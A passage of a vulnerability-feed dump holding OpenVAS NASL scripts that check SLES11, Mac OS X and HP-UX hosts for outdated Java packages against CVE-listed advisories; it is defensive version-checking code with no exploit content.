rpm:\"java-1_6_0-ibm-alsa~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-fonts\", rpm:\"java-1_6_0-ibm-fonts~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-jdbc\", rpm:\"java-1_6_0-ibm-jdbc~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-plugin\", rpm:\"java-1_6_0-ibm-plugin~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:65641", "href": "http://plugins.openvas.org/nasl.php?oid=65641", "type": "openvas", "title": "SLES11: Security update for IBM Java 1.6.0", "sourceData": "#\n#VID 7d9a96f54ebbdea55cd9630e7b8de703\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.6.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=489052\");\n script_id(65641);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for IBM Java 1.6.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm\", rpm:\"java-1_6_0-ibm~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-alsa\", rpm:\"java-1_6_0-ibm-alsa~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-fonts\", rpm:\"java-1_6_0-ibm-fonts~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-jdbc\", rpm:\"java-1_6_0-ibm-jdbc~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-plugin\", rpm:\"java-1_6_0-ibm-plugin~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-06T16:47:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "description": "The remote host is missing Java for Mac OS X 10.5 Update 3.", "modified": "2019-12-05T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:1361412562310102041", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310102041", "type": "openvas", "title": "Java for Mac OS X 10.5 Update 3", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Java for Mac OS X 10.5 Update 3\n#\n# LSS-NVT-2010-030\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.102041\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 13:49:16 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5340\", \"CVE-2008-5342\", \"CVE-2008-5343\");\n script_name(\"Java for Mac OS X 10.5 Update 3\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.5\\.\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT3437\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing Java for Mac OS X 10.5 Update 3.\");\n\n script_tag(name:\"affected\", value:\"One or more of the following components are affected:\n\n Java\");\n\n script_tag(name:\"solution\", value:\"Update your Java for Mac OS X. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver || ssh_osx_ver !~ \"^10\\.5\\.\") exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.6\",\"Mac OS X Server 10.5.6\");\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.6\")) {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.6\")) {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "description": "The remote host is missing Java for Mac OS X 10.5 Update 3.\n One or more of the following components are affected:\n\n Java", "modified": "2017-02-22T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:102041", "href": "http://plugins.openvas.org/nasl.php?oid=102041", "type": "openvas", "title": "Java for Mac OS X 10.5 Update 3", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Java for Mac OS X 10.5 Update 3\n#\n# LSS-NVT-2010-030\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\ntag_solution = \"Update your Java for Mac OS X.\n\n For more information see:\n http://support.apple.com/kb/HT3437\";\n\ntag_summary = \"The remote host is missing Java for Mac OS X 10.5 Update 3.\n One or more of the following components are affected:\n\n Java\";\n\n\nif(description)\n{\n script_id(102041);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 13:49:16 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2008-2086\",\"CVE-2008-5340\",\"CVE-2008-5342\",\"CVE-2008-5343\");\n script_name(\"Java for Mac OS X 10.5 Update 3\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\",\"ssh/login/osx_version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver) exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.6\",\"Mac OS X Server 10.5.6\");\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.6\")) {\n\tif (isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.6\")) {\n\tif (isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message(0); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Check for the Version of Java", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835195", "href": "http://plugins.openvas.org/nasl.php?oid=835195", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_id(835195);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_summary(\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 